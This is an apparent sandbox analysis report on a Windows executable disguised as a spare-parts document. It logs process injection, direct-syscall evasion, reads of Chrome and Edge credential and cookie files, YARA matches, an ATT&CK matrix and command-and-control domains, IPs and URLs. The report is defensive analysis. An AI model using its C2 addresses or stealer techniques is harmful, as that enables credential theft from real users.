                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6AA4 mov eax, dword ptr fs:[00000030h]4_2_011E6AA4
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190AD0 mov eax, dword ptr fs:[00000030h]4_2_01190AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C4AD0 mov eax, dword ptr fs:[00000030h]4_2_011C4AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C4AD0 mov eax, dword ptr fs:[00000030h]4_2_011C4AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6ACC mov eax, dword ptr fs:[00000030h]4_2_011E6ACC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6ACC mov eax, dword ptr fs:[00000030h]4_2_011E6ACC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6ACC mov eax, dword ptr fs:[00000030h]4_2_011E6ACC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CAAEE mov eax, dword ptr fs:[00000030h]4_2_011CAAEE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CAAEE mov eax, dword ptr fs:[00000030h]4_2_011CAAEE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C4D1D mov eax, dword ptr fs:[00000030h]4_2_011C4D1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01218D20 mov eax, dword ptr fs:[00000030h]4_2_01218D20
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01186D10 mov eax, dword ptr fs:[00000030h]4_2_01186D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01186D10 mov eax, dword ptr fs:[00000030h]4_2_01186D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01186D10 mov eax, dword ptr fs:[00000030h]4_2_01186D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AAD00 mov eax, dword ptr fs:[00000030h]4_2_011AAD00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AAD00 mov eax, dword ptr fs:[00000030h]4_2_011AAD00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtProtectVirtualMemory: Direct from: 0x77542F9C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtSetInformationProcess: Direct from: 0x77542C5C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtOpenKeyEx: Direct from: 0x77542B9C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtProtectVirtualMemory: Direct from: 0x77537B2E
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtCreateFile: Direct from: 0x77542FEC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtOpenFile: Direct from: 0x77542DCC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtQueryInformationToken: Direct from: 0x77542CAC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtTerminateThread: Direct from: 0x77542FCC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtDeviceIoControlFile: Direct from: 0x77542AEC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtAllocateVirtualMemory: Direct from: 0x77542BEC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtQueryVolumeInformationFile: Direct from: 0x77542F2C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtOpenSection: Direct from: 0x77542E0C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtAllocateVirtualMemory: Direct from: 0x775448EC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtSetInformationThread: Direct from: 0x775363F9
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtQuerySystemInformation: Direct from: 0x775448CC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtClose: Direct from: 0x77542B6C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtReadVirtualMemory: Direct from: 0x77542E8C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtCreateKey: Direct from: 0x77542C6C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtSetInformationThread: Direct from: 0x77542B4C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtQueryAttributesFile: Direct from: 0x77542E6C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtAllocateVirtualMemory: Direct from: 0x77543C9C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtCreateUserProcess: Direct from: 0x7754371C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtQueryInformationProcess: Direct from: 0x77542C26
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtResumeThread: Direct from: 0x77542FBC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtWriteVirtualMemory: Direct from: 0x7754490C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtDelayExecution: Direct from: 0x77542DDC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtAllocateVirtualMemory: Direct from: 0x77542BFC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtReadFile: Direct from: 0x77542ADC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtQuerySystemInformation: Direct from: 0x77542DFC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtResumeThread: Direct from: 0x775436AC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtNotifyChangeKey: Direct from: 0x77543C2C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtCreateMutant: Direct from: 0x775435CC
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtWriteVirtualMemory: Direct from: 0x77542E3C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, NtMapViewOfSection: Direct from: 0x77542D1C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Memory written: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Section loaded: NULL target: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\tzutil.exe, Section loaded: NULL target: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe protection: read write
                      Source: C:\Windows\SysWOW64\tzutil.exe, Section loaded: NULL target: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\tzutil.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\tzutil.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\tzutil.exe, Thread register set: target process: 6016
                      Source: C:\Windows\SysWOW64\tzutil.exe, Thread APC queued: target process: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Process created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Process created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe, Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                      Source: C:\Windows\SysWOW64\tzutil.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Program Manager
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Queries volume information: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe VolumeInformation
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara match | File source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1389196693.0000000004001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
[Behavior graph: ID 1562208; Sample: XFO-E2024-013 SMP-10.3-F01-...; Startdate: 25/11/2024; Architecture: WINDOWS; Score: 100. Process chain shown: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe starts two child instances of itself and drops XFO-E2024-013 SMP-...spare parts.exe.log (ASCII); one child is injected into xAbOwtcTtZmjBX.exe, which starts tzutil.exe; tzutil.exe is injected into xAbOwtcTtZmjBX.exe and starts firefox.exe; the injected xAbOwtcTtZmjBX.exe contacts www.expancz.top (107.155.56.30), www.070001325.xyz (161.97.142.144) and dns.ladipage.com (13.228.81.39).]

Source | Detection | Scanner | Label
XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | 100% | Joe Sandbox ML |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label
http://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA== | 100% | Avira URL Cloud | malware
http://www.taxiquynhonnew.click/y49d/ | 100% | Avira URL Cloud | malware
https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXg | 100% | Avira URL Cloud | malware
https://l3filejson4dvd.josyliving.com/favicon.ico | 0% | Avira URL Cloud | safe
https://login.7 | 0% | Avira URL Cloud | safe
http://www.taxiquynhonnew.click | 0% | Avira URL Cloud | safe
http://www.070001325.xyz/gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w== | 0% | Avira URL Cloud | safe
https://dq0ib5xlct7tw.cloudfront.net/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.expancz.top | 107.155.56.30 | true | true | | unknown
dns.ladipage.com | 13.228.81.39 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
www.070001325.xyz | 161.97.142.144 | true | true | | unknown
www.epitomize.shop | unknown | unknown | false | | unknown
www.taxiquynhonnew.click | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.070001325.xyz/gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w== | true | Avira URL Cloud: safe | unknown
http://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA== | true | Avira URL Cloud: malware | unknown
http://www.taxiquynhonnew.click/y49d/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://l3filejson4dvd.josyliving.com/favicon.ico | tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.7 | tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
